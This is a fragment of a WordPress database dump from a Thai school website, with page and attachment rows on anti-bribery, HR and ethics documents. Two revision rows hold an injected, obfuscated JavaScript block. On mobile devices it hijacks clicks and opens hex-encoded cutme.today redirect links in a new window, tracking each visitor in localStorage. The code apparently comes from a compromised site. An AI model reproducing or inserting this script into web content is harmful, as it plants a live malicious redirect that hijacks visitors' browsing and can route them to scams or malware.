_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน','','inherit','closed','closed','','1032-revision-v1','','','2025-07-01 09:25:59','2025-07-01 02:25:59','',1032,'http://pakhaeng.ssk.in.th/?p=1498',0,'revision','',0),
(1499,1,'2025-07-01 09:27:34','2025-07-01 02:27:34','','การบริหารและพัฒนาทรัพยากรบุคคล','','inherit','','closed','','%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%b2%e0%b8%97%e0%b8%a3%e0%b8%b1%e0%b8%9e%e0%b8%a2','','','2025-07-01 09:27:34','2025-07-01 02:27:34','',566,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การบริหารและพัฒนาทรัพยากรบุคคล.pdf',0,'attachment','application/pdf',0),
(1500,1,'2025-07-01 09:27:47','2025-07-01 02:27:47','<!-- wp:file {\"id\":1499,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การบริหารและพัฒนาทรัพยากรบุคคล.pdf\",\"displayPreview\":true,\"previewHeight\":800} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การบริหารและพัฒนาทรัพยากรบุคคล.pdf\" type=\"application/pdf\" style=\"width:100%;height:800px\" aria-label=\"การบริหารและพัฒนาทรัพยากรบุคคล\"></object><a id=\"wp-block-file--media-00124d1a-79ba-4db0-be25-eed8c6e99073\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การบริหารและพัฒนาทรัพยากรบุคคล.pdf\">การบริหารและพัฒนาทรัพยากรบุคคล</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การบริหารและพัฒนาทรัพยากรบุคคล.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-00124d1a-79ba-4db0-be25-eed8c6e99073\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','แผนการบริหารและพัฒนาทรัพยากรบุคคล','','inherit','closed','closed','','566-revision-v1','','','2025-07-01 09:27:47','2025-07-01 02:27:47','',566,'http://pakhaeng.ssk.in.th/?p=1500',0,'revision','',0),
(1502,1,'2025-07-01 09:31:17','2025-07-01 02:31:17','<!-- wp:image {\"id\":1750,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/tham-1024x256.png\" alt=\"\" class=\"wp-image-1750\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1503,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม\"></object><a id=\"wp-block-file--media-675dff9d-2979-4636-9d91-1a668135f1a0\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม.pdf\">ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-675dff9d-2979-4636-9d91-1a668135f1a0\">Download</a></div>\n<!-- /wp:file -->','ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม','','publish','closed','closed','','%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%a1%e0%b8%a7%e0%b8%a5%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%a2%e0%b8%98%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%82%e0%b8%b1','','','2025-07-07 15:05:29','2025-07-07 08:05:29','',0,'http://pakhaeng.ssk.in.th/?page_id=1502',0,'page','',0),
(1503,1,'2025-07-01 09:30:50','2025-07-01 02:30:50','','ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม','','inherit','','closed','','%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%a1%e0%b8%a7%e0%b8%a5%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%a2%e0%b8%98%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%82%e0%b8%b1','','','2025-07-01 09:30:50','2025-07-01 02:30:50','',1502,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม.pdf',0,'attachment','application/pdf',0),
(1504,1,'2025-07-01 09:31:17','2025-07-01 02:31:17','<!-- wp:file {\"id\":1503,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม\"></object><a id=\"wp-block-file--media-675dff9d-2979-4636-9d91-1a668135f1a0\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม.pdf\">ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-675dff9d-2979-4636-9d91-1a668135f1a0\">Download</a></div>\n<!-- /wp:file -->','ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม','','inherit','closed','closed','','1502-revision-v1','','','2025-07-01 09:31:17','2025-07-01 02:31:17','',1502,'http://pakhaeng.ssk.in.th/?p=1504',0,'revision','',0),
(1505,1,'2025-07-01 09:32:06','2025-07-01 02:32:06','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":1259,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2025.png\" alt=\"\" title=\"2025\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"currentTab\":4,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#f78da7\",\"titleBgHover\":\"#cf2e2e\",\"titleBgActive\":\"#cf2e2e\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#f78da7\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-4 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"cda4f9-0b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tabcda4f9-0b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469↗\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"size\":16,\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"e71bc9-b1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tabe71bc9-b1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</span></li>\n<!-- 